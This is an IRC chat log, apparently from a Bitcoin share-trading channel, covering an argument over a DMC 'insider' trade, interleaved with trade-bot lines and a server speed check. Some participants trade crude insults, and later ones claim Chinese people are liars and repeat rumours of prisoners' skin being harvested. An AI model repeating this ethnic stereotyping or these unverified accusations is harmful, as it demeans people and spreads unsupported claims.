really. drama is the only way truth can get out in circlejerk situations. Sep 04 22:39:05 (For those not doing rash decisions) Sep 04 22:39:18 and teh interweb sociali media tends to build up circlejerks Sep 04 22:41:05 whoa, what a little pearl : "We have also obtained 4,200 shares of DMC for only 50 bitcoins in a special one-time "insider" trade with Diablo-D3." Sep 04 22:41:17 how did you pay below mkt price usagi ? Sep 04 22:41:33 Because I traded for ASICMINER. Sep 04 22:41:42 >< Sep 04 22:41:43 I have yet to see any drama or people bashing on my threads. Sep 04 22:41:45 agagagaa Sep 04 22:41:47 All Diablo did Sep 04 22:41:54 o this is great. Sep 04 22:41:56 was set the price of MHASH to asic's price, "now". Sep 04 22:41:58 Diablo has fucked up DMC to infinity Sep 04 22:42:07 People who are paying .80 for GIGAMINING for example Sep 04 22:42:10 ---theyre living in a dream Sep 04 22:42:14 ASIC Sep 04 22:42:15 GIGA is worth less than DMC. Sep 04 22:42:20 "now", DMC > GIGAMINING. Sep 04 22:42:21 Right now. Sep 04 22:42:25 ahaha Sep 04 22:42:29 o god almighty. Sep 04 22:42:34 I disagree, usagi Sep 04 22:42:39 completely Sep 04 22:42:43 Think about it. DMC has 6.5 mhash a share. Sep 04 22:42:45 it is worth nothing Sep 04 22:42:48 Soon it will be 10. Sep 04 22:42:50 What will gigamining have? Sep 04 22:42:52 5? Sep 04 22:43:00 usagi: he's announced the upgrade path Sep 04 22:43:01 Gigamining is going to be 100 mhash per share Sep 04 22:43:01 and it's frree Sep 04 22:43:05 [GLBSE] [FPGAMINING] 5 @ 0.7327 = 3.6635 BTC [-] Sep 04 22:43:07 [GLBSE] [FPGAMINING] 25 @ 0.7326 = 18.315 BTC [-] Sep 04 22:43:07 Yes but DMC has those mhash NOW. Sep 04 22:43:07 my eyes are bleeding. Sep 04 22:43:08 [GLBSE] [FPGAMINING] 1 @ 0.7325 BTC [-] Sep 04 22:43:08 [GLBSE] [FPGAMINING] 9 @ 0.732 = 6.588 BTC [-] Sep 04 22:43:09 [GLBSE] [FPGAMINING] 2 @ 0.73 = 1.46 BTC [-] Sep 04 22:43:13 usagi: 100? Sep 04 22:43:14 or 25 mhash for the free path Sep 04 22:43:15 Gigamining has some kind of paid upgrade path. Sep 04 22:43:17 Well look Sep 04 22:43:19 usagi: AND PAYING NO DIVIDENDS Sep 04 22:43:22 usagi no it has jack shit now lmao. what now ? asics are just a dream yet. Sep 04 22:43:23 You don't realize this but you are 2 months late Sep 04 22:43:31 This was reported and dealt with 2 months ago Sep 04 22:43:37 dun dun dun. Sep 04 22:43:39 What Diablo is doing is apparently OK, so I decided to run with it Sep 04 22:43:41 and the sahre price has gone from 1 to bitcents Sep 04 22:43:58 So I traded a bunch of asicminer. I made some profit. In 6 months Sep 04 22:44:02 [GLBSE] [GSDPT] 150 @ 0.003393 = 0.509 BTC [+] Sep 04 22:44:04 You will wish you did too. Sep 04 22:44:05 it is almost criminal Sep 04 22:44:12 As mining bonds go to zero and DMC goes to 10 Sep 04 22:44:31 DMC has risen 80% since I did that trade Sep 04 22:44:36 Sorry. 800% Sep 04 22:44:39 no, i'm with JWU_42 here. it's criminal alright. Sep 04 22:44:41 wow .01 to .02 Sep 04 22:44:42 !pl DMC 0.0111111111 Sep 04 22:44:42 Requesting data from GLBSE (might take a while). Sep 04 22:44:47 DMC [1@0.01111111BTC] paid: 0.02635814 BTC. Last price: 0.07 BTC. Capital gain: 0.05888889 BTC. Total: 0.08524703 BTC. (767.2%) Sep 04 22:44:59 This is the profit you get from investing in EITHER ASICMINER or DMC. Sep 04 22:45:13 And more than 75% of the shares out now were traded after the asicminer deal Sep 04 22:45:14 usagi srsly... these things go on the record. what will you do in 6 months ? Sep 04 22:45:18 insist i learn when to stfu ? Sep 04 22:45:22 good luck selling your shares Sep 04 22:45:32 So frankly...... Do you know what you are talking about? No. Sep 04 22:45:41 this is so sad. Sep 04 22:45:42 You have it so wrong Sep 04 22:45:55 mircea_popescu: this will end badly Sep 04 22:45:57 that to actually educate you I thin kI would need to be paid for the massive amount of time Sep 04 22:46:09 JWU_42 yes, it will end badly. like ppt ended badly. you know for whom ? Sep 04 22:46:17 for my asshole Sep 04 22:46:21 yes Sep 04 22:46:24 mine too Sep 04 22:46:26 not for the incompetent bunch that thinks it knows finance. Sep 04 22:46:27 no no Sep 04 22:46:28 the double dong Sep 04 22:46:29 you are my asshole, JWU_42 Sep 04 22:46:40 you are my mother figure Sep 04 22:46:43 oh, but I KNOW I know finance Sep 04 22:46:47 I don't just think it Sep 04 22:46:50 I am so awesome Sep 04 22:46:58 in every way ? Sep 04 22:47:04 nah, every way but one Sep 04 22:47:11 sharpie in poopar nao pls. Sep 04 22:47:11 I know just enough to be dangerous Sep 04 22:47:33 I know more about finance than you could possibly understand mircea Sep 04 22:48:00 If you and I sat down and discussed it one of two things would happen, we'd either become friends, or you would be unable to speak from the depth of my knowledge. Sep 04 22:48:03 anyone who has to say that - isn't telling the truth Sep 04 22:48:16 Mircea says it all the time :p Sep 04 22:48:26 if you were that good - everyone would say it for you Sep 04 22:48:32 [GLBSE] [GIGAMINING] 1 @ 0.76 BTC [-] Sep 04 22:48:36 I also got DMC shares for cheap... at some point DMC was trading 1 ASICMINER for 9 DMC (When ASICMINER was still IPOING at 0.10 each) Sep 04 22:48:44 this is one of the few times I agree with mircea_popescu ;) Sep 04 22:48:51 on the subject of DMC Sep 04 22:49:00 It was way too low, killed DMC share prices definitly. Sep 04 22:49:19 JWU_42 you do tend to agree with me, it's just not always at the same time. Sep 04 22:49:20 I'm the one that walked away with 800% profit Sep 04 22:49:31 But before this I spent about a month trying to petition Diablo to do it properly Sep 04 22:49:32 and DMC selling 5000 shares for less then .01 when i paid 1 -- WTF Sep 04 22:49:35 He wouldn't listen, so.. Sep 04 22:49:52 mircea_popescu: fair enough... Sep 04 22:49:53 When he came to me with this plan, and explained it, it actually kinda started to make sense Sep 04 22:49:58 I'm glad I took the deal Sep 04 22:50:05 usagi: what was the total net profit - not % Sep 04 22:50:22 over 200 bitcoins so far Sep 04 22:50:30 who gives flying fuck if you 800% totals less than 100 BTC Sep 04 22:50:41 Dunno, probably noone Sep 04 22:51:11 This is why people are in the nyan thread telling me how great I am at finance. Sep 04 22:51:17 I was flabbergasted he never mentioned it on his thread. I just happened to notice it because I have his trade chart in my favorite and watch it. Sep 04 22:51:30 I reported it immediately in my letter to shareholders. Sep 04 22:51:41 He prices everything in mhash/potential mhash, not market price Sep 04 22:51:52 I price things as market price. Sep 04 22:51:52 Which is actually brilliant. Sep 04 22:52:01 It's one of the few accretive shares out there Sep 04 22:52:09 No... it's not brillant Sep 04 22:52:12 Yup. Sep 04 22:52:16 It's over 6 mhash Sep 04 22:52:22 Why don't you buy more? Sep 04 22:52:24 He should have sold market and bought the other for market. Sep 04 22:52:26 it's only 0.08 Sep 04 22:52:27 who gives flying fuck if you 800% totals less than 100 BTC ,<<< this. Sep 04 22:52:27 and the market values it at .07 Sep 04 22:52:37 Would have gotten a LOT more than by just trading... Sep 04 22:52:48 If you sit down and actually look at what is going on Sep 04 22:53:00 The market values YABMC's 1 Mh/s at .115 (or so) Sep 04 22:53:01 You will realize that DMC is over 6mhash per share for 0.08 Sep 04 22:53:09 and same for pure and the others Sep 04 22:53:16 so it is 6x worse Sep 04 22:53:17 DMC is a major holding of NYAN.B and BMF Sep 04 22:53:17 ;) Sep 04 22:53:26 Over 15% in both cases iirc Sep 04 22:53:28 CONFLICT OF INTEREST Sep 04 22:53:30 ;) Sep 04 22:53:31 [GLBSE] [TYGRR.BOND-P] 25 @ 0.09 = 2.25 BTC [+] Sep 04 22:53:44 Conflict of interest? Sep 04 22:53:50 fascinating how much fun teh kids today can have out of 200 bitcoins. Sep 04 22:53:51 DMC is supposed to eb accumulating funds to build a mining farm Sep 04 22:53:57 there's 18 companies and complex shareholding relations Sep 04 22:54:03 How is that a conflict of interest Sep 04 22:54:05 in case the SEC ever comes asking questions i give them usagi. Sep 04 22:54:14 that'll keep them working for 6 months. Sep 04 22:54:18 heh Sep 04 22:54:19 I don't live in the USA and I'm not a citizen. Sep 04 22:54:24 even better. Sep 04 22:54:25 [GLBSE] [ASICMINER] 1 @ 0.1249 BTC [-] Sep 04 22:54:30 whoa, where you from usagi? Sep 04 22:54:38 日本 Sep 04 22:54:41 I am from the moon kingdom. Sep 04 22:54:41 sorry, forgot :) Sep 04 22:54:42 he's from xanadu, land of the finance ppl. Sep 04 22:54:53 My mother was Chang'e. I am the princess of the moon. Sep 04 22:55:00 his mother was a bank and his father a golden paperweight Sep 04 22:55:05 兎 Sep 04 22:55:08 whee Sep 04 22:55:17 =^^= Sep 04 22:56:14 his mother was a bank and his father a golden paperweight << Now that is funny Sep 04 22:56:41 i ocasionally have my moments Sep 04 22:56:45 My full title is Usagi Fushi no Kyuuketsuki Ohimeasma. And as the princess of the moon I demand that Mircea refer to me by my proper title from now on or face... the penalties. Sep 04 22:57:03 mkay countess paperweight Sep 04 22:57:18 [GLBSE] [OBSI.HRPT] 14 @ 0.1021 = 1.4294 BTC [+] Sep 04 22:57:19 .tr miasma Sep 04 22:57:20 mircea_popescu: "miasma" (en to en, translate.google.com) Sep 04 22:57:22 pff Sep 04 22:57:27 it actually means stench in romanian Sep 04 22:57:32 [GLBSE] [ASICMINER] 20 @ 0.1249 = 2.498 BTC [-] Sep 04 22:57:40 [GLBSE] [ASICMINER] 20 @ 0.1249 = 2.498 BTC [-] Sep 04 22:57:58 [GLBSE] [CPA] 3 @ 0.059 = 0.177 BTC [-] Sep 04 22:58:04 [GLBSE] [ASICMINER] 8 @ 0.1249 = 0.9992 BTC [-] Sep 04 22:58:05 [GLBSE] [ASICMINER] 2 @ 0.125 = 0.25 BTC [+] Sep 04 22:58:09 mircea: I gave the 200 bitcoins to my shareholders. Sep 04 22:58:40 [GLBSE] [FDBF] 10 @ 0.14999999 = 1.5 BTC [+] Sep 04 22:59:15 [GLBSE] [NYAN.C] 1 @ 0.74 BTC [+] Sep 04 22:59:34 mircea_popescu: it means stench in english too Sep 04 22:59:51 or greek, I guess :P Sep 04 23:00:38 o, you're greek ? Sep 04 23:02:03 [GLBSE] [ASICMINER] 11 @ 0.1249 = 1.3739 BTC [-] Sep 04 23:02:05 [GLBSE] [ASICMINER] 45 @ 0.125 = 5.625 BTC [+] Sep 04 23:02:48 mircea_popescu: fuck you shit bird Sep 04 23:02:58 lol? Sep 04 23:03:13 EskimoBob it's not my fault about your mother man. how was i going to know ? Sep 04 23:03:16 Shit bird, that's a new one.. what brought this on Sep 04 23:04:33 lol Sep 04 23:04:45 usagi: EskimoBob disapproves of mircea_popescu's involvement in porn Sep 04 23:04:49 as fas as I remember Sep 04 23:05:05 mircea_popescu: what kind of porn did you do, anyway? gay for pay/ Sep 04 23:05:10 that's the best Sep 04 23:05:11 i just thought he's a little unhinged cause his toaster buying ipo didn't go so well ? Sep 04 23:06:24 Well, in one sense porn is just a business. But, a responsible businessman would realize it offends many, many people. Sep 04 23:06:42 Even just politically it sets you up as a target. It's easy to take a stance against MPEX because, well, let's be honest Sep 04 23:06:46 It hosts illegal porn. Sep 04 23:06:50 lol Sep 04 23:07:09 usagi: I'm curious, how old are you? Sep 04 23:07:14 this isn't a rhetorical question Sep 04 23:07:29 usagi if you thought things through for a second, you'd realise you're safer with someone that has been hosting a 4chan for years Sep 04 23:07:36 than wioth some random kid who bought a domain. Sep 04 23:08:23 [GLBSE] [ASICMINER] 1 @ 0.125 BTC [+] Sep 04 23:08:46 It's not about that Sep 04 23:08:58 Like i said it's just a business. It just makes you a target Sep 04 23:09:34 "it just makes me a target". i've been a target. for a long while. do you understand this ? Sep 04 23:09:51 i have bigger guns is the point, my safety isn't your mousy safety, let's be anon and hope we're never a target. Sep 04 23:09:58 Erm no you don't Sep 04 23:10:04 I mean politically (I said politically) Sep 04 23:10:13 I can just say "You host porn, no discussion, won't list" Sep 04 23:10:18 because some deluded fuck who thinks he lives on the moon says so. right. Sep 04 23:10:24 You can't even respond to that logically Sep 04 23:10:32 Lol, everyone knows it dude Sep 04 23:10:33 you don't have anything you could list to begin with. Sep 04 23:10:38 It's a running joke, mpex hosts porn Sep 04 23:11:20 Am I wrong? :p Sep 04 23:11:24 i'm fascinated tho. so you think you're good enough to list on mpex now ?! who the fuck are you ? what have you done ? Sep 04 23:11:28 gtfo lmao. Sep 04 23:11:32 I hear glenn beck murdered a hooker Sep 04 23:11:35 I can't believe I have stayed away from this channel for so long - this is hilarious Sep 04 23:11:47 JWU_42 lettat be a lesson to you. Sep 04 23:12:09 Right because 2 days ago you were congratulating me on the work I did with nyan, and 2 weeks before that telling me to keep up the good work with bmf Sep 04 23:12:13 copumpkin i hear jimblo wales did porn too. Sep 04 23:12:15 [GLBSE] [ASICMINER] 4 @ 0.125 = 0.5 BTC [+] Sep 04 23:12:21 mircea_popescu: ooh Sep 04 23:12:23 mircea_popescu: you are a loser. Period. You bragging here just makes you even bigger loser. There is nothing you can really do about it except just fuck off. Sep 04 23:12:23 [GLBSE] [ASICMINER] 2 @ 0.125 = 0.25 BTC [+] Sep 04 23:12:24 usagi quote pls. Sep 04 23:12:38 Lol you want me to quote you from 2 weeks ago on irc Sep 04 23:12:41 EskimoBob hello and welcome back to the place where we type words. well done, keep up the good work. Sep 04 23:12:50 usagi i want you to back up what you say. Sep 04 23:13:00 I want you to STAND by what you say Sep 04 23:13:05 sigh. Sep 04 23:13:07 Not demand people quote you Sep 04 23:13:09 stand by meeeee Sep 04 23:13:11 You know what you said :) Sep 04 23:13:24 yes, i do. which is why i ask for a quote. Sep 04 23:13:33 From 2 weeks ago on IRC. Sep 04 23:13:49 Well I want a peanut butter sandwich. Sep 04 23:13:51 you say that like a douche that has no ideea what logs are. Sep 04 23:13:52 And a car. Sep 04 23:13:57 mircea_popescu: longer you talk, bigger fool you look. You are a loser. What part of this you do not understand? Sep 04 23:14:01 Oh you have logs Sep 04 23:14:06 d'oh ?! Sep 04 23:14:09 Toss 'em over usagi@tsukino.ca Sep 04 23:14:13 right. Sep 04 23:14:21 it'll be 5 btc per mb. Sep 04 23:14:30 name the channels you want i'll give you an address. Sep 04 23:14:40 [GLBSE] [MU] 5 @ 0.39 = 1.95 BTC [-] Sep 04 23:14:41 It's your interest Sep 04 23:14:42 not mine Sep 04 23:14:45 wtf an east european hooker is cheaper, you must know mircea Sep 04 23:14:56 PsychoticBoy hey, guy's a banker, he makes 800% Sep 04 23:15:00 i gotta make ends meet over here. Sep 04 23:15:11 Oh and by the way that'll be 10btc for the sandwich, mircea Sep 04 23:15:15 (same logic) Sep 04 23:15:27 you are a porn peddling turd. Your "exchange" is also a host for porn Sep 04 23:15:28 the sandwhich you ate, i'm paying for ? Sep 04 23:15:32 fucken welfare generation. Sep 04 23:15:34 "I can hear a lot of kids arguing in here!" https://encrypted-tbn3.google.com/images?q=tbn:ANd9GcSJkqT9TWq-N_2gfbkqwA9b-Xp29TSYmcZ92EvUvVaauDCTil6H Sep 04 23:15:37 EskimoBob so is your mother. Sep 04 23:15:38 The logs you sent, I'm paying for? Sep 04 23:15:56 EskimoBob has a thing for feces Sep 04 23:15:57 so is my mother? Sep 04 23:15:57 [GLBSE] [OBSI.HRPT] 10 @ 0.1021 = 1.021 BTC [+] Sep 04 23:16:03 your site is a turd, mining bonds are truds Sep 04 23:16:04 yes bobby, so is your mother. Sep 04 23:16:05 what a idiot you are :) Sep 04 23:16:13 so is my mother what? Sep 04 23:16:20 a porn peddling turd. Sep 04 23:16:29 Seriously tho, can't we all agree everyone hates everyone and stay quiet? Sep 04 23:16:40 i don't hate everyone. Sep 04 23:16:49 fuck you for even suggesting it. Sep 04 23:16:51 I hate very few people Sep 04 23:17:00 but dislike many Sep 04 23:17:04 what are you babbling about mircea_popescu? Sep 04 23:17:15 now there i agree with the JWU_42. i dislike many people. Sep 04 23:17:42 ok - we found 2 things we can agree on - progress... Sep 04 23:18:13 wtf are you guys arguing about Sep 04 23:18:17 Bah, I'll be in #bitcoin-shares mindining my own business... Sep 04 23:18:21 in case anyone's curious about EskimoBob's mom btw : http://25.media.tumblr.com/tumblr_liw53fRFCm1qexv0so1_500.jpg Sep 04 23:18:27 nothing really coingenuity Sep 04 23:18:38 mircea_popescu is freaking out Sep 04 23:18:43 coingenuity well it started from dmc and ended up a general discussion on things Sep 04 23:18:44 [MPEX] [S.BVPS] 150 @ 0.00357261 = 0.5359 BTC [-] Sep 04 23:19:07 WHY CANT WE ALL JUST GET ALONG! Sep 04 23:19:10 and posting images of his mom . how pathetic is that :) Sep 04 23:19:12 LOL Sep 04 23:19:16 lol Sep 04 23:19:16 what a loser you are mircea_popescu Sep 04 23:19:20 [GLBSE] [YABMC] 37 @ 0.1068 = 3.9516 BTC [-] Sep 04 23:19:38 EskimoBob my mom ain't barefoot. Sep 04 23:19:51 on a serious note though, lets try to keep it civil.... we're all peers in a tiny community so we should try to get along Sep 04 23:20:11 mircea_popescu: do you even know who she is? Sep 04 23:20:12 if we're all throwing shit at one another in a tiny room, everyone ends up covered in shit Sep 04 23:20:15 [GLBSE] [YABMC] 99 @ 0.1067 = 10.5633 BTC [-] Sep 04 23:20:16 nah. getting along is what inflates ponzis. Sep 04 23:20:25 we should focus on saying things, no maatter who gets hurt. Sep 04 23:21:10 nah, gotta maintain amicable atmosphheres to get anything done Sep 04 23:21:21 look, you've tried that theory in otc Sep 04 23:21:23 otc went to shit. Sep 04 23:21:29 this is the place where people getting things done moved. Sep 04 23:21:33 let's learn the lessons of the past. Sep 04 23:21:53 [MPEX] [S.MPOE] 25979 @ 0.00039988 = 10.3885 BTC [-] Sep 04 23:21:54 [MPEX] [S.MPOE] 5221 @ 0.000397 = 2.0727 BTC [-] Sep 04 23:22:11 don't make friends just because people are in the same cryptocurrency as you. make friends if people are worthy of being your friends. Sep 04 23:22:57 otc is a nice idea but it needs to be institutionalized. Sep 04 23:23:09 ahahaha Sep 04 23:23:20 Turned into a credit agency. Sep 04 23:23:39 usagi : institutionalized means in english "put into mental hospital" Sep 04 23:23:44 "are worthy of" - you talk like a scammer Sep 04 23:23:56 No it does not always mean that, Mircea... Sep 04 23:24:32 in fact Sep 04 23:24:40 the meaning you quoted is a secondary meaning Sep 04 23:24:51 sigh Sep 04 23:24:53 institutionalize/ˌinstiˈt(y)o͞oSHənlˌīz/ Sep 04 23:24:53 1. Establish (something, typically a practice or activity) as a convention or norm in an organization or culture. Sep 04 23:24:53 2. Place or keep (someone) in a residential institution. Sep 04 23:24:56 you know english better than me too now ? Sep 04 23:24:57 mircea Sep 04 23:25:00 that video is hilarious Sep 04 23:25:00 http://en.wikipedia.org/wiki/Institutionalized Sep 04 23:25:02 about the .it theifs Sep 04 23:25:05 Well, yeah actually Sep 04 23:25:07 theifs* Sep 04 23:25:10 thiefs* Sep 04 23:25:11 For one, I'm an English teacher Sep 04 23:25:11 rg yea Sep 04 23:25:19 I'll leave it there though Sep 04 23:25:24 you're a finance english teacher ? Sep 04 23:25:31 [GLBSE] [OBSI.HRPT] 1 @ 0.1021 BTC [+] Sep 04 23:25:35 No, I didn't say that. Sep 04 23:25:49 so you're a non native speaker public worker on the lowest possible pay braket Sep 04 23:26:01 Nope, didn't say that either. Sep 04 23:26:02 and you daresay you know both the language and finance better than anyone. Sep 04 23:26:06 this is fascinating even moar. Sep 04 23:26:13 I didn't say that either. Sep 04 23:26:16 You're basically a liar. Sep 04 23:26:41 i'm a liar because you're a teacher who aspires to be something more than a teacher ? Sep 04 23:26:42 Why does everyone misquotes everyone? Sep 04 23:26:48 I said, "otc is a nice idea but it needs to be institutionalized." and in response to your blatant troll, "No it does not always mean that, Mircea..." Sep 04 23:26:53 Then I quoted the dictionary. Sep 04 23:26:55 BTC-Mining cause quoting properly takes work. Sep 04 23:27:03 That's it. Sep 04 23:27:11 you know, troll can't be used like that either. Sep 04 23:27:19 troll is a noun. Sep 04 23:27:21 Yeah you're a troll. Sep 04 23:27:24 mircea_popescu you are lonely loser how made a penny more than your beggar neighbour and now you think you are something special. No, you are not :) Sep 04 23:27:25 It's pretty obvious. Sep 04 23:27:40 lonely loser how made a penny << how isn't used like that either. Sep 04 23:27:42 and yes, you are a troll Sep 04 23:27:47 jesus this should be #esl Sep 04 23:28:00 haha Sep 04 23:28:14 Or make assumptions? That's what makes bad partners, bad partners. Always jealous and jumping right to the conclusion, throwing shit everywhere before verifying anything... Sep 04 23:28:15 troll 1 (trl) v. trolled, troll·ing, trolls (http://www.thefreedictionary.com/troll) Sep 04 23:28:22 At this point is has become obvious Mircea is a poor troll... I'm out guys. Got work to do. Sep 04 23:28:42 BTC-Mining well, for my own education, point them out on my side. Sep 04 23:28:52 [GLBSE] [ASICMINER] 46 @ 0.125 = 5.75 BTC [+] Sep 04 23:28:54 [GLBSE] [OBSI.HRPT] 1 @ 0.1021 BTC [+] Sep 04 23:30:28 [GLBSE] [ASICMINER] 8 @ 0.12999999 = 1.04 BTC [+] Sep 04 23:34:15 [GLBSE] [YABMC] 11 @ 0.1066 = 1.1726 BTC [-] Sep 04 23:36:41 just chiming in on the OTC thing Sep 04 23:36:54 I think the whole system is flawed for larger groups Sep 04 23:36:59 works fine for small groups Sep 04 23:37:05 [GLBSE] [YABMC] 3 @ 0.1065 = 0.3195 BTC [-] Sep 04 23:37:06 once it grows past a certain size Sep 04 23:37:09 that may well be true. Sep 04 23:37:12 much of the ratings become useless Sep 04 23:37:20 as no one really knows anyone else Sep 04 23:37:27 for example Sep 04 23:37:30 pirate Sep 04 23:37:32 are you talking about otc or wot ? Sep 04 23:37:37 had a GREAT rating Sep 04 23:37:40 sorry Sep 04 23:37:41 WOT Sep 04 23:38:08 well, our hope is that historically a wot is what created capitalist economy. the hansa was one huge wot. the lombard trade was one huge wot Sep 04 23:38:12 the jewish were one immense wot. Sep 04 23:38:24 that may be so Sep 04 23:38:28 [GLBSE] [YABMC] 50 @ 0.1065 = 5.325 BTC [-] Sep 04 23:38:30 [GLBSE] [NYAN.A] 1 @ 1.01 BTC [+] Sep 04 23:38:30 of course, all of these were maintained by responsible people, who didn't give two rat's asses for decorum. Sep 04 23:38:32 but they were not anonymous Sep 04 23:38:34 were they? Sep 04 23:38:38 [GLBSE] [BITBOND] 1 @ 0.40009999 BTC [+] Sep 04 23:38:38 pseudonymous really Sep 04 23:38:38 [GLBSE] [BITBOND] 1 @ 0.40009999 BTC [+] Sep 04 23:38:39 [GLBSE] [BITBOND] 11 @ 0.4001 = 4.4011 BTC [+] Sep 04 23:38:46 as nobody could REALLY verify identity past this Sep 04 23:39:04 most of the classical art (operas etc) are based on mistaken identity Sep 04 23:39:14 why do you think ? because the entire economy was run as a pseudonymous wot. Sep 04 23:40:16 take the taming of the shrew as a fine example. servant and master switch roles. everyone knows there is a master, but nobody knows WHO exactly it is. except his own father. Sep 04 23:40:18 I think there is limits to a WOT and OTC where there is no enforcement of contracts beyond banishment from the community Sep 04 23:40:21 [GLBSE] [FPGAMINING] 1 @ 0.7299 BTC [-] Sep 04 23:40:24 trust me Sep 04 23:40:28 I have a real name Sep 04 23:40:35 k Sep 04 23:40:45 and even banishment doesn't work in an environment like this Sep 04 23:40:50 historically it worked, with the banishment. course we dunno if it ever can be made to work again. Sep 04 23:40:57 as there is always someone who is willing to do business with them Sep 04 23:41:01 [GLBSE] [BLUECHIP] 2 @ 0.1 = 0.2 BTC Sep 04 23:41:06 and Sep 04 23:41:20 people are able to easily re-invent their identity online Sep 04 23:41:22 nefario : for sure we have HUGE obstacles to overcome before this is all settled. Sep 04 23:41:22 nefario: more importantly, banishment doesn't work because you can create a new identity Sep 04 23:41:23 yeah Sep 04 23:41:32 [GLBSE] [KRAKEN] 7 @ 0.00999999 = 0.07 BTC [+] Sep 04 23:41:39 yeah, this is a serious problem, in and of itself. Sep 04 23:41:51 for all we know pirate is still around, facing us as some bright lad with an ideea. Sep 04 23:42:09 if we turn this into a paranoid xenophobia we will just wither and die. Sep 04 23:42:18 so... yeah. Sep 04 23:42:38 So what are bitcoins Sep 04 23:42:56 bitcoins are like totally awesome dude Sep 04 23:43:06 like Sep 04 23:43:08 lol bitfloor pwned? Sep 04 23:43:09 you can Sep 04 23:43:11 Bitcoins are a way to drag hackers and techies kicking and screaming into the real world; the wot trust model doesn't work Sep 04 23:43:12 smoke them Sep 04 23:43:13 dub yup Sep 04 23:43:16 wait Sep 04 23:43:17 muppets Sep 04 23:43:17 no Sep 04 23:43:19 and all those big bad banks? they were right all along Sep 04 23:43:20 you can Sep 04 23:43:26 BUY smokes with them Sep 04 23:43:27 ja Sep 04 23:43:34 dub some people are doubting whether it was an actual compromise. Sep 04 23:44:18 oh hey, bitcoinica 2.0 Sep 04 23:44:42 I hate all this conspiracy talk Sep 04 23:44:57 it gets so boring when you hear it again and again Sep 04 23:45:11 everytime something happens Sep 04 23:45:14 well the story is that someone connected to a server through which they connected to the server where they held unencrypted pws of the wallet. Sep 04 23:45:16 Do you have logs of the ip who created the trade? Sep 04 23:45:17 crys of INSIDE JOB Sep 04 23:45:22 this is doable but SO DIFFICULT to do... Sep 04 23:45:49 nefario: so you believe zhou's story? that his 'friend' took the money then gave it back? Sep 04 23:45:57 not at all Sep 04 23:46:05 you damn conspiracy theorist Sep 04 23:46:11 I haven't believed zhou since the first hack Sep 04 23:46:12 dub it's such a stupid story tho... who the fuck knows anymore. Sep 04 23:46:26 nefario wasn't slush hit in that one too ? the vps thing ? Sep 04 23:46:28 thing is its a perfectly reasonable story to a chinaman Sep 04 23:46:29 and I've dealt with Chinese people Sep 04 23:46:35 because they are baldfaced lying morons Sep 04 23:46:43 so I generally dont trust any of them Sep 04 23:46:44 what, all the chinese are liars now ? Sep 04 23:46:48 yes Sep 04 23:46:57 mircea_popescu: not all, just most Sep 04 23:47:00 its a cultural aspect of china Sep 04 23:47:02 i only knew a handful of chinese people, and never been there Sep 04 23:47:05 but they seemed ok Sep 04 23:47:17 you never had the chance to learn for yourself Sep 04 23:47:21 indeed not. Sep 04 23:47:33 I would only do business with family there Sep 04 23:47:37 wouldn't trust anyone else Sep 04 23:47:44 which Sep 04 23:47:55 funny enough is often how things work there Sep 04 23:47:59 even family.. Sep 04 23:48:01 hmmm... isn't this what the chinese themselves do ? only deal in family ? Sep 04 23:48:11 you can't control what happens to them because the entire country is corrupt Sep 04 23:48:12 ja still need to be careful even with family Sep 04 23:48:57 there certainly is more to the friend took money gave back story tho. Sep 04 23:49:04 i mean, i read the logs. zhou was "not getting a salary" ? Sep 04 23:49:14 they had a layered cake of conventions, deals and dealings a mile tall. Sep 04 23:49:19 maybe there wasn't more Sep 04 23:49:23 maybe there was less Sep 04 23:49:27 who cares Sep 04 23:49:32 it's such a quagmire Sep 04 23:49:39 with so many liers Sep 04 23:49:44 why even bother trying Sep 04 23:49:46 it doesnt matter if you trust them or they are trustworthy, an event that seems unconscionable to you is normal to them Sep 04 23:50:02 like simply having everythign they have ever owned taken by someone else with no recourse Sep 04 23:50:29 this sounds like bdsm already. Sep 04 23:50:33 they'll just be like, 'oh well' move on, nothing can be done Sep 04 23:50:52 [GLBSE] [ARS] 100 @ 0.0152 = 1.52 BTC [+] Sep 04 23:51:01 i guess it must happen often then. Sep 04 23:51:04 if they complain the'll probably end up being injected into an americans lips Sep 04 23:51:23 [GLBSE] [GIGAMINING] 1 @ 0.76 BTC [-] Sep 04 23:51:47 (biotech manufacturing plants are attached to prisons in china) Sep 04 23:51:50 [GLBSE] [GIGAMINING] 3 @ 0.7501 = 2.2503 BTC [-] Sep 04 23:51:58 fun Sep 04 23:52:01 or you know Sep 04 23:52:05 off to the 4 year gulag Sep 04 23:52:12 thats quite common Sep 04 23:52:13 there are stories of prisoners having their skin harvested for collagen while still alive Sep 04 23:52:22 hm Sep 04 23:52:32 impossible to discern truth from journofiction in those tho Sep 04 23:52:34 at least for me Sep 04 23:53:34 communism with "chinese characterisitics" is what they call it Sep 04 23:53:35 lol Sep 04 23:53:53 I forget who but a reasonably big news outfit did a sting buy of chinese collagen which tested as human derived Sep 04 23:53:53 another name for it is fascism without killing jews Sep 04 23:54:03 oh dear Sep 04 23:54:06 is that bad dub? Sep 04 23:54:13 rg Sep 04 23:54:18 you server slow Sep 04 23:54:19 well ya but i mean human derived... Sep 04 23:54:22 MAKE IT FAST!!! Sep 04 23:54:28 nefario: which server Sep 04 23:54:35 eh my one Sep 04 23:54:38 someone has been syncing a bitcoind after i told them not to Sep 04 23:54:38 give me a sec Sep 04 23:55:10 you're on dallas Sep 04 23:55:15 it shouldn't be too slow Sep 04 23:55:17 its not loaded Sep 04 23:55:27 16:55:21 up 122 days, 16:42, 1 user, load average: 1.65, 1.40, 1.51 Sep 04 23:55:45 and that 1 is your ruby process Sep 04 23:55:54 http://67.222.146.58:9999/asset/view/BITBOND Sep 04 23:56:11 should be fast Sep 04 23:56:14 seems fine to me.. Sep 04 23:56:14 but it's not Sep 04 23:56:16 Syncing Sep 04 23:56:22 someone else view that Sep 04 23:56:24 is it slow? Sep 04 23:56:26 What do you mean by syncing? Is it me? Sep 04 23:56:27 it loaded very quick for me Sep 04 23:56:40 are you in dallas? Sep 04 23:56:44 no Sep 04 23:56:46 rg http://browsershots.org/http://67.222.146.58:9999/asset/view/BITBOND Sep 04 23:56:47 im on the other side of the country Sep 04 23:56:48 that was yest. Sep 04 23:56:51 real 0m2.140s Sep 04 23:56:51 user 0m0.004s Sep 04 23:56:51 sys 0m0.012s Sep 04 23:56:56 that's curl url_here Sep 04 23:57:00 like 9x% of them timed out Sep 04 23:57:34 dude look at the URL theyre loading Sep 04 23:57:37 its not that IP Sep 04 23:57:45 it's what he quoted above ? Sep 04 23:58:05 http://api.browsershots.org/png/original/fd/fd8b4f767e646334df3ea1b898395979.png Sep 04 23:58:08 look at the URL being loaded Sep 04 23:58:10 its not 